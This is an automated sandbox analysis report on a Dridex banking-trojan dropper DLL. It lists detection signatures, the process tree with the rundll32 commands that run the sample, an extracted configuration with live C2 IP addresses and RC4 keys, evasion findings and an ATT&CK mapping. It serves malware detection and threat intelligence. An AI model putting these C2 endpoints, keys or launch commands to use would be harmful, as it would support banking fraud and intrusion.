Play interactive tour

Edit tour

Analysis Report CTkT1fRtQv.dll

Overview

General Information

Sample Name:	CTkT1fRtQv.dll
Analysis ID:	392884
MD5:	304c6fb5258a065507a5ea8625fbf120
SHA1:	386f11c61362582fb431758483579cef18094043
SHA256:	ab022d18682f942315316baa838852c3010df92e79f645b37c7afd2b85623b2b
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1552 cmdline: loaddll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6164 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6204 cmdline: rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6544 cmdline: rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 420 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.631275717.0000000073311000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.rundll32.exe.73310000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.73310000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 6.2.rundll32.exe.73310000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: CTkT1fRtQv.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.b90000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 6.2.rundll32.exe.6d0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 2.2.rundll32.exe.2a30000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: CTkT1fRtQv.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: CTkT1fRtQv.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb+ source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.562166429.0000000005534000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000011.00000003.562166429.0000000005534000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.294950857.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.356955165.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.294950857.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.356955165.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.567915828.0000000001032000.00000004.00000010.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp, CTkT1fRtQv.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: CTkT1fRtQv.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000006.00000002.631275717.0000000073311000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.73310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.73310000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73322790 NtAllocateVirtualMemory,	2_2_73322790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7332218C NtDelayExecution,	2_2_7332218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7331BC00 NtClose,	2_2_7331BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733207CC	2_2_733207CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73311494	2_2_73311494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733292DC	2_2_733292DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73319144	2_2_73319144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7331A5A4	2_2_7331A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733184E4	2_2_733184E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733214D8	2_2_733214D8

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 420

Source: CTkT1fRtQv.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs CTkT1fRtQv.dll

Source: CTkT1fRtQv.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: CTkT1fRtQv.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1552

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE7E.tmp

Jump to behavior

Source: CTkT1fRtQv.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 420
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1	Jump to behavior

Source: CTkT1fRtQv.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: CTkT1fRtQv.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb+ source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.562166429.0000000005534000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000011.00000003.562166429.0000000005534000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.294950857.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.356955165.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.294950857.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.356955165.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.567915828.0000000001032000.00000004.00000010.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp, CTkT1fRtQv.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.562170398.0000000005537000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.562162414.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.562127824.0000000005561000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_7331F744 push esi; mov dword ptr [esp], 00000000h

2_2_7331F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 1943

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1076			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 866			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_733207CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_733207CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 00000011.00000002.569242042.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000011.00000002.569242042.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000011.00000002.569242042.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000011.00000002.569242042.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_73316DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_73316DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_73323060 RtlAddVectoredExceptionHandler,

2_2_73323060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.630359279.0000000002F20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.630929010.0000000002FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.630359279.0000000002F20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.630929010.0000000002FB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.630359279.0000000002F20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.630929010.0000000002FB0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000002.00000002.630359279.0000000002F20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.630929010.0000000002FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000002.00000002.630359279.0000000002F20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.630929010.0000000002FB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_73316DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_73316DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery111	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CTkT1fRtQv.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.b90000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
6.2.rundll32.exe.6d0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
2.2.rundll32.exe.2a30000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	CTkT1fRtQv.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392884
Start date:	19.04.2021
Start time:	23:47:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CTkT1fRtQv.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.7% (good quality ratio 94.1%) Quality average: 79.3% Quality standard deviation: 27.7%
HCA Information:	Successful, ratio: 84% Number of executed functions: 24 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
